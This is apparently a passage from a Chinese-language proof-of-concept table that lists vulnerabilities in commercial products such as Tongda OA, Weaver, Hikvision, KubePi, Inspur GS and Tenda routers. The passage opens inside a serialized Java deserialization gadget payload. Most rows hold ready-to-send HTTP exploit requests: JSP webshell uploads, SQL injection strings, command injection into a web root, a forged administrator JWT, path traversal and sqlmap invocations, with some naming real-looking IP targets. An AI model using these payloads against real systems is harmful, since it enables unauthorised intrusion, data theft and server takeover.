07destroy\x01\x00’\x28Ljava/lang/String;\x29Ljava/lang/Process;\x01\x00\x16\x28Ljava/lang/String;I\x29V\x01\x00\x0fgetOutputStream\x01\x00\x18\x28\x29Ljava/io/OutputStream;\x01\x00\x08isClosed\x01\x00\x13java/io/InputStream\x01\x00\x09available\x01\x00\x03\x28\x29I\x01\x00\x04read\x01\x00\x14java/io/OutputStream\x01\x00\x04\x28I\x29V\x01\x00\x05sleep\x01\x00\x04\x28J\x29V\x01\x00\x09exitValue\x01\x00\x0agetMessage\x01\x00\x08intValue\x00!\x00\x8f\x00\x1e\x00\x01\x00\x0f\x00\x03\x00\x1a\x00\x90\x00\x91\x00\x01\x00\x92\x00\x00\x00\x02\x00\x93\x00\x02\x00\x94\x00\x91\x00\x00\x00\x02\x00\x95\x00\x96\x00\x00\x00\x09\x00\x01\x00\x97\x00\x98\x00\x02\x00\x99\x00\x00\x03\xb6\x00\x06\x00\x13\x00\x00\x02\x8e*\xb7\x00\x01\xb8\x00\x02\xb6\x00\x03L+\xb6\x00\x04\x12\x05\xb6\x00\x06M,\x04\xb6\x00\x07,+\xb6\x00\x08\xc0\x00\x09\xc0\x00\x09N-:\x04\x19\x04\xbe6\x05\x036\x06\x15\x06\x15\x05\xa2\x02X\x19\x04\x15\x062:\x07\x19\x07\xc7\x00\x06\xa7\x02C\x19\x07\xb6\x00\x0a:\x08\x19\x08\x12\x0b\xb6\x00\x0c\x9a\x00\x0d\x19\x08\x12\x0d\xb6\x00\x0c\x9a\x00\x06\xa7\x02%\x19\x07\xb6\x00\x04\x12\x0e\xb6\x00\x06M,\x04\xb6\x00\x07,\x19\x07\xb6\x00\x08:\x09\x19\x09\xc1\x00\x0f\x9a\x00\x06\xa7\x02\x02\x19\x09\xb6\x00\x04\x12\x10\xb6\x00\x06M,\x04\xb6\x00\x07,\x19\x09\xb6\x00\x08:\x09\x19\x09\xb6\x00\x04\x12\x11\xb6\x00\x06M\xa7\x00\x16:\x0a\x19\x09\xb6\x00\x04\xb6\x00\x13\xb6\x00\x13\x12\x11\xb6\x00\x06M,\x04\xb6\x00\x07,\x19\x09\xb6\x00\x08:\x09\x19\x09\xb6\x00\x04\xb6\x00\x13\x12\x14\xb6\x00\x06M\xa7\x00\x10:\x0a\x19\x09\xb6\x00\x04\x12\x14\xb6\x00\x06M,\x04\xb6\x00\x07,\x19\x09\xb6\x00\x08:\x09\x19\x09\xb6\x00\x04\x12\x15\xb6\x00\x06M,\x04\xb6\x00\x07,\x19\x09\xb6\x00\x08\xc0\x00\x16\xc0\x00\x16:\x0a\x19\x0a\xb9\x00\x17\x01\x00:\x0b\x19\x0b\xb9\x00\x18\x01\x00\x99\x01[\x19\x0b\xb9\x00\x19\x01\x00:\x0c\x19\x0c\xb6\x00\x04\x12\x1a\xb6\x00\x06M,\x04\xb6\x00\x07,\x19\x0c\xb6\x00\x08:\x0d\x19\x0d\xb6\x00\x04\x12\x1b\x03\xbd\x00\x1c\xb6\x00\x1d\x19\x0d\x03\xbd\x00\x1e\xb6\x00\x1f:\x0e\x19\x0d\xb6\x00\x04\x12 \x04\xbd\x00\x1cY\x03\x12!S\xb6\x00\x1d\x19\x0d\x04\xbd\x00\x1eY\x03\x12\”S\xb6\x00\x1f\xc0\x00!:\x0f\x19\x0f\xc7\x00\x06\xa7\xff\x91*\x19\x0f\xb6\x00#\xb6\x00$:\x10\x19\x0e\xb6\x00\x04\x12%\x04\xbd\x00\x1cY\x03\xb2\x00&S\xb6\x00\x1d\x19\x0e\x04\xbd\x00\x1eY\x03\x11\x00\xc8\xb8\x00’S\xb6\x00\x1fW*\x12\x28\xb6\x00\x29:\x11\x19\x11\xb6\x00*:\x09\x19\x11\x12+\x06\xbd\x00\x1cY\x03\x12,SY\x04\xb2\x00&SY\x05\xb2\x00&S\xb6\x00-\x19\x09\x06\xbd\x00\x1eY\x03\x19\x10SY\x04\x03\xb8\x00’SY\x05\x19\x10\xbe\xb8\x00’S\xb6\x00\x1fW\x19\x0e\xb6\x00\x04\x12.\x04\xbd\x00\x1cY\x03\x19\x11S\xb6\x00\x1d\x19\x0e\x04\xbd\x00\x1eY\x03\x19\x09S\xb6\x00\x1fW\xa7\x00O:\x11*\x120\xb6\x00\x29:\x12\x19\x12\x121\x04\xbd\x00\x1cY\x03\x12,S\xb6\x00-\x19\x12\x04\xbd\x00\x1eY\x03\x19\x10S\xb6\x00\x1f:\x09\x19\x0e\xb6\x00\x04\x12.\x04\xbd\x00\x1cY\x03\x19\x12S\xb6\x00\x1d\x19\x0e\x04\xbd\x00\x1eY\x03\x19\x09S\xb6\x00\x1fW\xa7\x00\x0e\xa7\x00\x05:\x08\x84\x06\x01\xa7\xfd\xa7\xb1\x00\x07\x00\xa0\x00\xab\x00\xae\x00\x12\x00\xce\x00\xdc\x00\xdf\x00\x12\x01\xc4\x020\x023\x00/\x00?\x00D\x02\x85\x00/\x00G\x00b\x02\x85\x00/\x00e\x00\x85\x02\x85\x00/\x00\x88\x02\x7f\x02\x85\x00/\x00\x01\x00\x9a\x00\x00\x00\xde\x007\x00\x00\x00\x17\x00\x04\x00\x18\x00\x0b\x00\x19\x00\x15\x00\x1a\x00\x1a\x00\x1b\x00&\x00\x1d\x00?\x00\x1f\x00G\x00 \x00N\x00!\x00e\x00\”\x00p\x00#\x00u\x00$\x00\x7d\x00%\x00\x88\x00&\x00\x93\x00’\x00\x98\x00\x28\x00\xa0\x00*\x00\xab\x00-\x00\xae\x00+\x00\xb0\x00,\x00\xc1\x00.\x00\xc6\x00/\x00\xce\x001\x00\xdc\x004\x00\xdf\x002\x00\xe1\x003\x00\xec\x005\x00\xf1\x006\x00\xf9\x007\x01\x04\x008\x01\x09\x009\x01\x17\x00:\x013\x00;\x01>\x00<\x01C\x00=\x01K\x00>\x01d\x00?\x01\x8a\x00@\x01\x8f\x00A\x01\x92\x00C\x01\x9d\x00D\x01\xc4\x00F\x01\xcc\x00G\x01\xd3\x00H\x02\x0e\x00I\x020\x00N\x023\x00J\x025\x00K\x02=\x00L\x02]\x00M\x02\x7f\x00O\x02\x82\x00S\x02\x85\x00Q\x02\x87\x00\x1d\x02\x8d\x00U\x00\x9b\x00\x00\x00\x04\x00\x01\x00/\x00\x01\x00\x9c\x00\x9d\x00\x03\x00\x99\x00\x00\x009\x00\x02\x00\x03\x00\x00\x00\x11+\xb8\x002\xb0M\xb8\x00\x02\xb6\x004+\xb6\x005\xb0\x00\x01\x00\x00\x00\x04\x00\x05\x003\x00\x01\x00\x9a\x00\x00\x00\x0e\x00\x03\x00\x00\x00_\x00\x05\x00`\x00\x06\x00a\x00\x9b\x00\x00\x00\x04\x00\x01\x003\x00\x9e\x00\x00\x00\x02\x00\x9f\x00\x01\x00\xa0\x00\xa1\x00\x01\x00\x99\x00\x00\x00\xff\x00\x04\x00\x04\x00\x00\x00\x9b+\xc6\x00\x0c\x126+\xb6\x007\x99\x00\x06\x128\xb0+\xb6\x009L+\x12:\xb6\x00;\x99\x00;*+\xb7\x00<\x12=\xb6\x00>M,\xbe\x05\x9f\x00\x06\x12?\xb0*,\x032\xb5\x00@*,\x042\xb8\x00A\xb8\x00’\xb5\x00B\xbb\x00CY*\xb7\x00DN-\xb6\x00E\x12F\xb0+\x12G\xb6\x00;\x99\x00\”*+\xb7\x00<\x12=\xb6\x00>M,\xbe\x05\x9f\x00\x06\x12H\xb0*,\x032,\x042\xb6\x00I\xb0+\x12J\xb6\x00;\x99\x00\x0d**+\xb7\x00<\xb6\x00K\xb0**+\xb7\x00<\xb6\x00K\xb0\x00\x00\x00\x01\x00\x9a\x00\x00\x00R\x00\x14\x00\x00\x00k\x00\x0d\x00l\x00\x10\x00n\x00\x15\x00o\x00\x1e\x00q\x00\x29\x00r\x00/\x00s\x002\x00u\x009\x00v\x00F\x00w\x00O\x00x\x00S\x00y\x00V\x00z\x00_\x00\x7b\x00j\x00|\x00p\x00\x7d\x00s\x00\x7f\x00~\x00\x80\x00\x87\x00\x81\x00\x91\x00\x83\x00\x01\x00\xa2\x00\xa3\x00\x01\x00\x99\x00\x00\x00v\x00\x03\x00\x05\x00\x00\x006\xbb\x00LY+\xb7\x00MN\xbb\x00NY-\xb7\x00O:\x04\x19\x04,\xb8\x00P\xb6\x00Q\x19\x04\xb6\x00R\x19\x04\xb6\x00S\xa7\x00\x0b:\x04\x19\x04\xb6\x00T\xb0-\xb6\x00U\xb0\x00\x01\x00\x09\x00&\x00\x29\x00/\x00\x01\x00\x9a\x00\x00\x00&\x00\x09\x00\x00\x00\x8e\x00\x09\x00\x90\x00\x13\x00\x91\x00\x1c\x00\x92\x00!\x00\x93\x00&\x00\x96\x00\x29\x00\x94\x00+\x00\x95\x001\x00\x97\x00\x02\x00\xa4\x00\xa1\x00\x01\x00\x99\x00\x00\x00/\x00\x03\x00\x02\x00\x00\x00\x17+\x12:\x126\xb6\x00V\x12J\x126\xb6\x00V\x12G\x126\xb6\x00V\xb0\x00\x00\x00\x01\x00\x9a\x00\x00\x00\x06\x00\x01\x00\x00\x00\xa0\x00\x01\x00\xa5\x00\xa1\x00\x01\x00\x99\x00\x00\x01\xc3\x00\x04\x00\x09\x00\x00\x01’\x12W\xb8\x00X\xb6\x00YM+\xb6\x009L\x01N,\x12Z\xb6\x00\x0c\x99\x00@+\x12[\xb6\x00\x0c\x99\x00 +\x12\\\xb6\x00\x0c\x9a\x00\x17\xbb\x00]Y\xb7\x00^+\xb6\x00_\x12`\xb6\x00_\xb6\x00aL\x06\xbd\x00!Y\x03\x12\”SY\x04\x12bSY\x05+S:\x04\xa7\x00=+\x12[\xb6\x00\x0c\x99\x00 +\x12\\\xb6\x00\x0c\x9a\x00\x17\xbb\x00]Y\xb7\x00^+\xb6\x00_\x12c\xb6\x00_\xb6\x00aL\x06\xbd\x00!Y\x03\x12dSY\x04\x12eSY\x05+S:\x04\xb8\x00f\x19\x04\xb6\x00gN\xbb\x00hY-\xb6\x00i\xb7\x00j\x12k\xb6\x00l:\x05\x19\x05\xb6\x00m\x99\x00\x0b\x19\x05\xb6\x00n\xa7\x00\x05\x126:\x06\xbb\x00hY-\xb6\x00o\xb7\x00j\x12k\xb6\x00l:\x05\xbb\x00]Y\xb7\x00^\x19\x06\xb6\x00_\x19\x05\xb6\x00m\x99\x00\x0b\x19\x05\xb6\x00n\xa7\x00\x05\x126\xb6\x00_\xb6\x00a:\x06\x19\x06:\x07-\xc6\x00\x07-\xb6\x00p\x19\x07\xb0:\x05\x19\x05\xb6\x00T:\x06-\xc6\x00\x07-\xb6\x00p\x19\x06\xb0:\x08-\xc6\x00\x07-\xb6\x00p\x19\x08\xbf\x00\x04\x00\x90\x00\xfb\x01\x06\x00/\x00\x90\x00\xfb\x01\x1a\x00\x00\x01\x06\x01\x0f\x01\x1a\x00\x00\x01\x1a\x01\x1c\x01\x1a\x00\x00\x00\x01\x00\x9a\x00\x00\x00j\x00\x1a\x00\x00\x00\xa9\x00\x09\x00\xaa\x00\x0e\x00\xab\x00\x10\x00\xad\x00\x19\x00\xae\x00+\x00\xaf\x00?\x00\xb1\x00V\x00\xb3\x00h\x00\xb4\x00|\x00\xb6\x00\x90\x00\xb9\x00\x99\x00\xba\x00\xab\x00\xbb\x00\xbf\x00\xbc\x00\xd1\x00\xbd\x00\xf7\x00\xbe\x00\xfb\x00\xc2\x00\xff\x00\xc3\x01\x03\x00\xbe\x01\x06\x00\xbf\x01\x08\x00\xc0\x01\x0f\x00\xc2\x01\x13\x00\xc3\x01\x17\x00\xc0\x01\x1a\x00\xc2\x01 \x00\xc3\x00\x01\x00\xa6\x00\xa7\x00\x01\x00\x99\x00\x00\x01r\x00\x04\x00\x0c\x00\x00\x00\xe2\x12W\xb8\x00X\xb6\x00Y\x12Z\xb6\x00\x0c\x9a\x00\x09\x12qN\xa7\x00\x06\x12rN\xb8\x00f-\xb6\x00s:\x04\xbb\x00tY+\x1c\xb7\x00u:\x05\x19\x04\xb6\x00i:\x06\x19\x04\xb6\x00o:\x07\x19\x05\xb6\x00v:\x08\x19\x04\xb6\x00w:\x09\x19\x05\xb6\x00x:\x0a\x19\x05\xb6\x00y\x9a\x00`\x19\x06\xb6\x00z\x9e\x00\x10\x19\x0a\x19\x06\xb6\x00\x7b\xb6\x00|\xa7\xff\xee\x19\x07\xb6\x00z\x9e\x00\x10\x19\x0a\x19\x07\xb6\x00\x7b\xb6\x00|\xa7\xff\xee\x19\x08\xb6\x00z\x9e\x00\x10\x19\x09\x19\x08\xb6\x00\x7b\xb6\x00|\xa7\xff\xee\x19\x0a\xb6\x00\x7d\x19\x09\xb6\x00\x7d\x14\x00~\xb8\x00\x80\x19\x04\xb6\x00\x81W\xa7\x00\x08:\x0b\xa7\xff\x9e\x19\x04\xb6\x00p\x19\x05\xb6\x00\x82\xa7\x00 N\xbb\x00]Y\xb7\x00^\x12\x83\xb6\x00_-\xb6\x00\x84\xb6\x00_\x12\x85\xb6\x00_\xb6\x00a\xb0\x12\x86\xb0\x00\x02\x00\xa7\x00\xad\x00\xb0\x00/\x00\x00\x00\xbf\x00\xc2\x00/\x00\x01\x00\x9a\x00\x00\x00n\x00\x1b\x00\x00\x00\xd1\x00\x10\x00\xd2\x00\x16\x00\xd4\x00\x19\x00\xd6\x00\”\x00\xd7\x00-\x00\xd8\x00B\x00\xd9\x00P\x00\xda\x00X\x00\xdb\x00`\x00\xdc\x00m\x00\xde\x00u\x00\xdf\x00\x82\x00\xe1\x00\x8a\x00\xe2\x00\x97\x00\xe4\x00\x9c\x00\xe5\x00\xa1\x00\xe6\x00\xa7\x00\xe8\x00\xad\x00\xe9\x00\xb0\x00\xea\x00\xb2\x00\xeb\x00\xb5\x00\xed\x00\xba\x00\xee\x00\xbf\x00\xf1\x00\xc2\x00\xef\x00\xc3\x00\xf0\x00\xdf\x00\xf2\x00\x01\x00\xa8\x00\x98\x00\x01\x00\x99\x00\x00\x00-\x00\x03\x00\x01\x00\x00\x00\x11**\xb4\x00@*\xb4\x00B\xb6\x00\x87\xb6\x00\x88W\xb1\x00\x00\x00\x01\x00\x9a\x00\x00\x00\x0a\x00\x02\x00\x00\x00\xf7\x00\x10\x00\xf8\x00\x09\x00\xa9\x00\xaa\x00\x01\x00\x99\x00\x00\x01\x1c\x00\x06\x00\x04\x00\x00\x00\xac\x01L\x12\x89\xb8\x002M,\x12\x8a\x04\xbd\x00\x1cY\x03\x12!S\xb6\x00\x1d,\xb6\x00*\x04\xbd\x00\x1eY\x03*S\xb6\x00\x1f\xc0\x00,\xc0\x00,L\xa7\x00\x04M+\xc7\x00C\x12\x8b\xb8\x002\x12\x8c\x03\xbd\x00\x1c\xb6\x00\x1d\x01\x03\xbd\x00\x1e\xb6\x00\x1fM,\xb6\x00\x04\x12\x8d\x04\xbd\x00\x1cY\x03\x12!S\xb6\x00\x1d,\x04\xbd\x00\x1eY\x03*S\xb6\x00\x1f\xc0\x00,\xc0\x00,L\xa7\x00\x04M+\xc7\x004\x12\x8e\xb8\x002M,\x12\x8d\x04\xbd\x00\x1cY\x03\x12!S\xb6\x00\x1dN-,\xb6\x00*\x04\xbd\x00\x1eY\x03*S\xb6\x00\x1f\xc0\x00,\xc0\x00,L\xa7\x00\x04M+\xb0\x00\x03\x00\x02\x00-\x000\x00/\x005\x00q\x00t\x00/\x00y\x00\xa6\x00\xa9\x00/\x00\x01\x00\x9a\x00\x00\x00F\x00\x11\x00\x00\x01\x00\x00\x02\x01\x02\x00\x08\x01\x03\x00-\x01\x06\x000\x01\x04\x001\x01\x07\x005\x01\x09\x00L\x01\x0a\x00q\x01\x0d\x00t\x01\x0b\x00u\x01\x0f\x00y\x01\x11\x00\x7f\x01\x12\x00\x8f\x01\x13\x00\xa6\x01\x16\x00\xa9\x01\x14\x00\xaa\x01\x18\x00\x01\x00\xab\x00\x00\x00\x02\x00\xact\x00\x0bdefineClassuq\x00~\x00\x1a\x00\x00\x00\x02vr\x00\x10java.lang.String\xa0\xf0\xa48z;\xb3B\x02\x00\x00xpvq\x00~\x00\x28sq\x00~\x00\x13uq\x00~\x00\x18\x00\x00\x00\x01uq\x00~\x00\x1a\x00\x00\x00\x00q\x00~\x00\x1cuq\x00~\x00\x1a\x00\x00\x00\x01q\x00~\x00\x1esq\x00~\x00\x13uq\x00~\x00\x18\x00\x00\x00\x01uq\x00~\x00\x18\x00\x00\x00\x00q\x00~\x00\”uq\x00~\x00\x1a\x00\x00\x00\x01q\x00~\x00$sq\x00~\x00\x0fsq\x00~\x00\x00w\x0c\x00\x00\x00\x10?@\x00\x00\x00\x00\x00\x00xsr\x00\x11java.util.HashMap\x05\x07\xda\xc1\xc3\x16`\xd1\x03\x00\x02F\x00\x0aloadFactorI\x00\x09thresholdxp?@\x00\x00\x00\x00\x00\x00w\x08\x00\x00\x00\x10\x00\x00\x00\x00xxx”)}} |
| 红海云eHR系统kgFile.mob存在任意文件上传漏洞 | POST /RedseaPlatform/kqFile.mob?method=uploadFile&fileName=fbjgrohu.jsp HTTP/1.1 Host: User-Agent: Go-http-client/1.1 Content-Type: multipart/form-data; boundary=—-WebKitFormBoundaryeaaGwoqCxccjHcca Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 183 ——WebKitFormBoundaryeaaGwoqCxccjHcca <% out.println(111*111); %> |
| 超级猫签名APP分发平台前台存在SQL注入漏洞 | GET /user/install/downfile_ios?id=’) UNION ALL SELECT NULL,NULL,CONCAT(IFNULL(CAST(CURRENT_USER() AS NCHAR),0x20)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL– – HTTP/1.1 Cache-Control: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 127.0.0.1:81 Accept: */* Accept-Encoding: gzip, deflate Connection: close |
| 超级猫签名APP分发平台前台远程文件写入漏洞 | /user/profile/download?url=http://云服务器地址/111.php&path=1 |
| 通达OAV11.10接口login.php存在SQL注入漏洞 | POST /ispirit/interface/login.php HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.855.2 Safari/537.36 Content-Type: application/x-www-form-urlencoded Host: Content-Length: 107 name=123&pass=123&_SERVER[REMOTE_ADDR]=1′,’10’,(select+@`,’`+or+if(1% 3d0,1,(select+~0%2b1))+limit+0,1))–+’ |
| 邦永PM2项目管理平台系统ExcelIn.aspx存在任意文件上传漏洞 | POST /FlowChartDefine/ExcelIn.aspx HTTP/1.1 Host: Content-Type: multipart/form-data; boundary=—-WebKitFormBoundaryAU4uQKbpWhA7eME3 Cookie: ASP.NET_SessionId=oewffeov54f2dfj3iyz2u1qp Accept-Language: zh-CN,zh;q=0.9 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Cache-Control: max-age=0 Accept-Encoding: gzip, deflate Content-Length: 1470 ——WebKitFormBoundaryAU4uQKbpWhA7eME3 U6iRl9SqWWlhjIPJXIeFrsinqYAmYxenxFiyfWFMfWgnw3OtkceDLcdfRvB8pmUNGk44PvjZ6LlzPwDbJGmilsmhuX9LvOiuKadYa9iDdSipLW5JvUHjS89aGzKqr9fhih+p+/Mm+q2vrknhfEJJnQ== FD259C0F /pKblUYGQ+ibKtw4CCS2wzX+lmZIOB+x5ezYw0qJFbaUifUKlxNNRMKceZYgY/eAUUTaxe0gSvyv/oA8lUS7G7jPVqqrMEzYBVBl8dRkFWFwMqqjv1G9gXM/ZnIpnVSL {{unquote(“PK\x03\x04\x14\x00\x01\x00\x00\x00\xefl\xfaX\x1c:\xf5\xcb\x11\x00\x00\x00\x05\x00\x00\x00\x08\x00\x00\x001234.txt\xb0\x0c\x01\x08\xd1!\xd1Uv \xfal\x9b\xf4Q\xfd\xf8PK\x01\x02?\x00\x14\x00\x01\x00\x00\x00\xefl\xfaX\x1c:\xf5\xcb\x11\x00\x00\x00\x05\x00\x00\x00\x08\x00$\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x001234.txt\x0a\x00 \x00\x00\x00\x00\x00\x01\x00\x18\x00\x05\x8d\x9d.\x1e\xdf\xda\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00PK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00Z\x00\x00\x007\x00\x00\x00\x00\x00”)}} 模块导入 |
| 群杰印章物联网管理平台rest密码重置 | /api/token/updateRestUser?restname=rest&password={{password}} |
| 群杰印章物联网管理平台文件上传0day漏洞 | 未知 |
| 用友NC 电采complainjudge接口SQL注入漏洞 | NC系统 /ebvp/advorappcoll/complainbilldetail 和complainjudge接口的pk_complaint参数存在SQL注入 |
| 海康威视综合安防管理平台前台远程命令执行 | POST /portal/cas/login/ajax/licenseExpire.do HTTP/1.1 Host: x.x.x.x Cache-Control: max-age=0 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest If-Modified-Since: Thu, 01 Jun 1970 00:00:00 GMT User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http:///portal/cas/login/loginPage.do?service=http://x.x.x.x:80/portal Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: JSESSIONID=jp9u6tFmSc3fk7Jzf9DQjK25abfBb_b4Yy1r4rax; curtTabId=all; configMenu= Connection: close Content-Length: 135 {“type”:”environment”,”operate”:””,”machines”:{“id”:”$(id > /opt/hikvision/web/components/tomcat85linux64.1/webapps/vms/static/1.txt)”} |
| 瑞格心里教育信息化管理系统SQL注入漏洞 | 未知 |
| 苏州梓川信息PEPM系统反序列化漏洞 | 未知 |
| 方天云智慧平台系统 GetCompanyItem SQL注入漏洞 | /AjaxMethods.asmx/GetCompanyItem |
| 任我行协同CRM反序列化漏洞 | 星球搜索”任我行协同”获取POC |
| 热网无线监测系统frmSaveChartImage存在 任意文件读取漏洞 | 未知 |
| 泛微HrmService存在SQL注入漏洞 | POST /services/HrmService HTTP/1.1Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.88 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brConnection: closeSOAPAction: urn:weaver.hrm.webservice.HrmService.getHrmDepartmentInfoContent-Type: text/xml;charset=UTF-8Host: Content-Length: 427X-Forwarded-For: 127.0.0.1gero et1)AND(db_name()like’ec%’ |
| 北京派网软件有限公司Panabit-Panalog大数据日志审计系统sprog_upstatus.php存在SQL注入漏洞(CVE-2024-2014) | GET /Maintain/sprog_upstatus.php?status=1&id=1%20and%20updatexml(1,concat(0x7e,user()),0)&rdb=1 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Host: 103.39.233.29 |
| KubePi存在JWT token验证绕过漏洞 | POST /kubepi/api/v1/users HTTP/1.1 Host: Content-Length: 248 Accept: application/json, text/plain, */* lang: zh-CN Content-Type: application/json sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 sec-ch-ua-platform: “” Origin: http://127.0.0.1:9982 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://127.0.0.1:9982/kubepi/user-management/users/create Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJuaWNrTmFtZSI6IkFkbWluaXN0cmF0b3IiLCJlbWFpbCI6InN1cHBvcnRAZml0MmNsb3VkLmNvbSIsImxhbmd1YWdlIjoiemgtQ04iLCJyZXNvdXJjZVBlcm1pc3Npb25zIjp7fSwiaXNBZG1pbmlzdHJhdG9yIjp0cnVlLCJtZmEiOnsiZW5hYmxlIjpmYWxzZSwic2VjcmV0IjoiIiwiYXBwcm92ZWQiOmZhbHNlfSwiaWF0IjoxNzE2NDQ3MDEyLCJleHAiOjE3MjI0NDcwMTJ9.dedNLwXZu0JY1sgGBCRZmpFvAnLdHjxdPmKWXA7LCf4 Connection: close {“apiVersion”:”v1″,”kind”:”User”,”name”:”test1″,”roles”:[“Common User”,”Manage Image Registries”,”Manage Clusters”,”Manage RBAC”],”nickName”:”tang”,”email”:”test1@qq.com”,”authenticate”:{“password”:”12345678@Test”},”mfa”:{“enable”:false,”secret”:””}} |
| 浪潮GS企业管理软件多处 .NET反序列化RCE漏洞poc1 | POST /cwbase/service/rps/xtdysrv.asmx HTTP/1.1 Host: Content-Type: text/xml; charset=utf-8 Content-Length: length cmd: whoami SOAPAction: “http://tempuri.org/SavePrintFormatAssign” <?xml version=”1.0″ encoding=”utf-8″?> |
| 浪潮GS企业管理软件多处 .NET反序列化RCE漏洞poc2 | POST /cwbase/gsp/webservice/bizintegrationwebservice/bizintegrationwebservice.asmx HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/61.0.1191.80 Safari/537.36 Content-Type: text/xml; charset=utf-8 SOAPAction: “http://tempuri.org/GetChildFormAndEntityList” cmd: ipconfig <?xml version=”1.0″ encoding=”utf-8″?> |
| Quicklancer存在SQL注入漏洞 | GET /listing?cat=6&filter=1&job-type=1&keywords=Mr.&location=1&order=desc&placeid=US&placetype=country&range1=1&range2=1&salary-type=1&sort=id&subcat= HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Host: Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive python3 sqlmap.py -r test.txt -p range2 –dbms=mysql –current-db –current-user –batch |
| 因酷教育平台RCE(CVE-2024-35570) | POST /image/gok4?¶m=image&fileType=jpg,gif,png,jpeg,jspx&pressText=undefined HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=—————————308436435515370414691526924874 Content-Length: 2853 Origin: http://192.168.3.102:8080 Connection: close Referer: http://192.168.3.102:8080/admin/website/doUpdateImages/309 Upgrade-Insecure-Requests: 1 Priority: u=4 —————————–308436435515370414691526924874 123 |
| Tenda FH1201 v1.2.0.14接口WriteFacMac存在远程命令执行漏洞(CVE-2024-41473) | import requests
ip = ‘192.168.74.145’ url = “http://” + ip + “/goform/WriteFacMac” data = {“mac”: payload} |
| Tenda FH1201 v1.2.0.14接口exeCommand存在远程命令执行漏洞(CVE-2024-41468) | import requests
ip = ‘192.168.74.145’ url = f”http://{ip}/goform/exeCommand” data = “cmdinput=ls;” |
| 甄云 SRM 云平台 SpEL 表达式注入漏洞 | /oauth/public/SpEL表达式/ab?username=bHM= |
| 证书查询系统存在任意文件读取漏洞 | GET /index/ajax/lang?lang=../../application/database HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 |
| 喰星云·数字化餐饮服务系统not_out_depot存在SQL注入漏洞 | GET /logistics/home_warning/php/not_out_depot.php?do=getList&lsid= HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Accept-Encoding: gzip Connection: close |
| panabit日志审计系统sprog_upstatus存在SQL注入漏洞 | GET /Maintain/sprog_upstatus.php?status=1&id=1%20and%20updatexml(1,concat(0x7e,user()),0)&rdb=1 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Host: 47.93.242.67 |
| Quicklancer存在SQL注入漏洞 | GET /listing?cat=6&filter=1&job-type=1&keywords=Mr.&location=1&order=desc&placeid=US&placetype=country&range1=1&range2=1&salary-type=1&sort=id&subcat= HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Host: Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive python3 sqlmap.py -r test.txt -p range2 –dbms=mysql –current-db –current-user –batch |
